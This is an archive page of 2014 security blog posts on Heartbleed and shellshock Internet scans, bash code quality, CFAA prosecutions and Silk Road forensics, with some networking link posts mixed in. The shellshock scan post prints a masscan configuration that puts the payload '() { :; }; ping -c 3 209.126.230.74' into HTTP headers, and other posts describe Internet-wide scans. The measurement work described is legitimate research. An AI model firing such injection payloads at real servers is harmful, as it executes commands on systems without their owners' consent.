Archive

Category Archives for "Security"

Response to Kathy Sierra

People are asking me about this post from Kathy Sierra. It’s inaccurate, twisted, and personally insulting. That Kathy was doxxed and harassed 7 years is indeed an awful thing, but that doesn’t justify her own bad behavior toward others.

I always defend targets of lynch mobs, such as accused Boston Bomber Dzhokhar Tsarnaev. To the right is a picture of what appears to be Tsarnaev placing the bomb right behind 9 year old boy Martin Richards who died in the blast. I feel sick to my stomach looking at it. But here’s the thing: Tsarnaev is an American citizen, and I will vigorously defend his rights to due process. When they violated his civil rights, interrogating him for days while he hung near death in his hospital bed, begging for a lawyer, I vocally condemned this. All fruits of that interrogation need to be thrown out, even if it means Tsarnaev goes free. And I have no problem saying this to the face of Martin Richard’s parents.

Weev may be a bad human being, but he’s not as vile as mass bomber. I likewise defend him from lynch mobs. His arbitrary conviction and imprisonment under the CFAA was a gross Continue reading

Technology Short Take #45

Welcome to Technology Short Take #45. As usual, I’ve gathered a collection of links to various articles pertaining to data center-related technologies for your enjoyment. Here’s hoping you find something useful!

Networking

  • Cormac Hogan has a list of a few useful NSX troubleshooting tips.
  • If you’re not really a networking pro and need a “gentle” introduction to VXLAN, this post might be a good place to start.
  • Also along those lines—perhaps you’re a VMware administrator who wants to branch into networking with NSX, or you’re a networking guru who needs to learn more about how this NSX stuff works. vBrownBag has been running a VCP-NV series covering various objectives from the VCP-NV exam. Check them out—objective 1, objective 2, objective 3, and objective 4 have been posted so far.

Servers/Hardware

  • I’m going to go out on a limb and make a prediction: In a few years time (let’s say 3–5 years), Intel SGX (Software Guard Extensions) will be regarded as important if not more important than the virtualization extensions. What is Intel SGX, you ask? See here, here, and here for a breakdown of the SGX design objectives. Let’s be real—the ability for an Continue reading

Wget off the leash

As we all know, to grab a website with wget, we'll use the "-r" option to "recurse" through all the links. There is also the '-H' option, means that wget won't restrict itself to just one host. In other words, with '-r -H' together, it'll try to spider the entire Internet. So I did that to see what would happen.

Well, for a 32-bit bit process, what happened is that after more than a month, it ran out of memory. It maintained an ever growing list of URLs that it has to visit, which can easily run in the millions. At a hundred bytes per URL and 2-gigabytes of virtual memory, it'll run out of memory after 20 million URLs -- far short of the billions on the net. That's what you see below, where 'wget' has crashed exhausting memory. Below that I show the command I used to launch the process, starting at cnn.com as the seed with a max timeout of 5 seconds.



How much data did I download from the Internet? According to 'du', the answer is 18-gigabytes, as seen in the following screenshot:



It reached 79425 individual domains, far short of the millions it held Continue reading

Six-month anniversary scan for Heartbleed

I just launched my six-month anniversary scan for Heartbleed. I'll start reporting early results tomorrow afternoon. I'm dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send us your address ranges to our "abuse@" email address. We'll lookup the abuse contact email for those ranges and send you what we found for that range. (This offer good through the end of October 2014).



Here is a discussion of the options.

--conf /etc/masscan/masscan.conf
You don't see this option, but it's the default. This is where we have the 'excluderanges' configured. Because we exclude everyone who contacts us an "opts-out" of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The the "/0" means "the entire Internet". Actually, any valid IPv4 address can replace the 0.0.0.0 and it'll produce the same results, such as "127.0.0.0/0" to amuse your friends.

-p443
This says to scan on port 443, the default SSL port. At some point in Continue reading

Who named “shellshock”?

Because it's terribly important to cybersec, many are debating the origin of the name "shellshock". I thought I'd write up the definitive answer.

The answer is that it came from this tweet by Andreas Lindh. That's the absolute origin of the term. Andreas made it up himself.



Also, to some extent Davi Ottenheimer deserves some credit for starting the conversation among a bunch of people with his tweet saying "it's not big until there's a logo". Lots of people posted logos as that point.

Also to some extent I deserve some credit for then pimping the "shellshock" name in my blogposts, which received a lot of attention in the early hours of the shellshock crisis. As you can see from the pageview stats below, these posts got a lot of attention. Also, most of the early news stories on "real" news websites referenced me and my posts. Those news sites got the name from me, and I got it from Andreas and nobody else.



I suspect what really helped it along is that when I scanned the Internet for the bug, putting it in everybody's webserver logs. I included a pointer to the "shellshock scan" post in the Continue reading

Understanding the HP split

HP is splitting itself into "enterprise" and "consumer" companies. Why the split? Isn't the goal of big companies to get bigger? Well, no, that's just the cynical view of companies. The actual goal is to deliver value to stockholders. Splitting delivers value in two ways. The first is that it "exposes" the underlying business. The second is that it avoids dis-economies of scale.

Conglomerates like GE (General Electric) have a problem. While some businesses do well and grow, other businesses fail and shrink. You can't buy stock in the individual components of GE's business you think are growing, you have to take all or none. GE Medical has been growing fast, but you can't invest in it individually.

Thus, big companies frequently spin out such companies, either to divest themselves of the dead weight that isn't growing, or conversely, to let a growing part of these business to fly free without being held back by the deadweight. The fast growing parts of a business aren't inherently better. They tend to also be riskier, meaning that while their stock may surge, they have equal probability of going bankrupt soon.

We can see how this philosophy worked in the case of HP's Continue reading

Two Minutes of Hate: Marriot deauthing competing WiFi

Do you stand for principle -- even when it's against your interests? Would you defend the free-speed rights of Nazis, for example? The answer is generally "no", few people stand for principle. We see that in this morning's news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use their own high-priced WiFi.

The principle I want to discuss here is "arbitrary and discriminator enforcement". It was the principle behind the Aaron Swartz and Andrew "weev" Auernheimer cases. The CFAA is a vague law where it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was "unauthorized access", but because they pissed off the powerful. Prosecutors then interpreted the laws to suite their purposes.


The same thing is true in the Marriott case. Deauthing Wifi is common practice on large campuses everywhere, at company headquarters, hospitals, and college campuses. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It's also used at the DefCon conference, to prevent hostile access-points from tricking people by using "DefCon" in their name.

Section 333 of the Communications Continue reading

Opt-in for upcoming Heartbleed results

On October 8, the 6-month anniversary of Heartbleed, I'm going to scan the Internet again for it. I should find about 250k devices are still vulnerable. These are things like webcams, NAS boxes, forgotten VM instances, development machines, and so on -- few real "web servers" will be vulnerable.

I will, of course, exclude from my scan everyone who has asked to be excluded. My scan list is down to only 3.5 billion hosts because of all the exclusions I do. However, asking for whitehats to exclude you from their scans is not a smart security strategy. Therefore, if you are on our exclude list, I suggest you do the reverse: opt back in.

I mention this because we are going to try something new: allow people to opt-in to the results. Send us an email, and we'll send the results of our Heartbleed scan for your address range to the "abuse" address registered for that address range.

Reading the Silk Road configuration

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using "parallel construction", meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

The Tarbell declaration


A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server ("the Tarbell declaration"). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the "packet headers".

Thirdly, his saved none of the forensics data. You'd have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I'm a technical blogger. I document this sort Continue reading

Right-winger explains what’s wrong with ComputerCop

The EFF has a good article on ComputerCop. Police departments have lashed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF is a bunch of leftists, I'm a right-winger -- and I agree with them in this case. Maybe they'll find my right-wing criticisms of ComputerCop more believable.


The basic issue is that this program isn't "protection", but is instead a "virus". It's the same software hackers use to spy on computers. It's the same software that jealous lovers secretly install on their partner's computer. Some of the copies the police give out will be used for the intended purpose (parents hacking their children's computers), but also some copies will end-up in the hands of evil-doers who use it for hacking. When investigating domestic abuse cases over the next few years, police will find their own software on the victim's computer, placed there by the abuser.

Monitoring your child's online activities is a good thing. Hacking your child's computers is probably a bad thing. It's not the sort of activity police departments should be encouraging.

The software maker exploits the fact that rural county sheriffs are Continue reading

Bufferbloat Killed my HTTP Session… or not?

Every now and then I get an email from a subscriber having video download problems. Most of the time the problem auto-magically disappears (and there’s no indication of packet loss or ridiculous latency in traceroute printout), but a few days ago Henry Moats managed to consistently reproduce the problem and sent me exactly what I needed: a pcap file.

TL&DR summary: you have to know a lot about application-level protocols, application servers and operating systems to troubleshoot networking problems.

Read more ...

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses the K&R function headers which have been obsolete since the mid-1980s.


I don't think it's there to support older compilers, because other parts of the code use modern headers. I think it's there simply because they are paranoid about making unnecessary changes to the code. The effect of this is that it messes up static analysis, both simple compiler warnings as well as advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue, but a symptom that there is something seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundred(s) of global variables.


Also note that a large number of Continue reading

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmers writes 10x more code than they read. The only people where that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first 2 parts of this series, you can catch them here and here. The short version is that there are Enterprise customers that are actively seeking to automate the production deployment of their workloads, which leads them to discover that capturing business policy as part of the process is critical. We’ve arrived here at the point that once policy can be encapsulated in the process of application workload orchestration, it is then necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to-date, networking has largely been about any-to-any all equal connectivity (at least in Data Centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester researcher wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading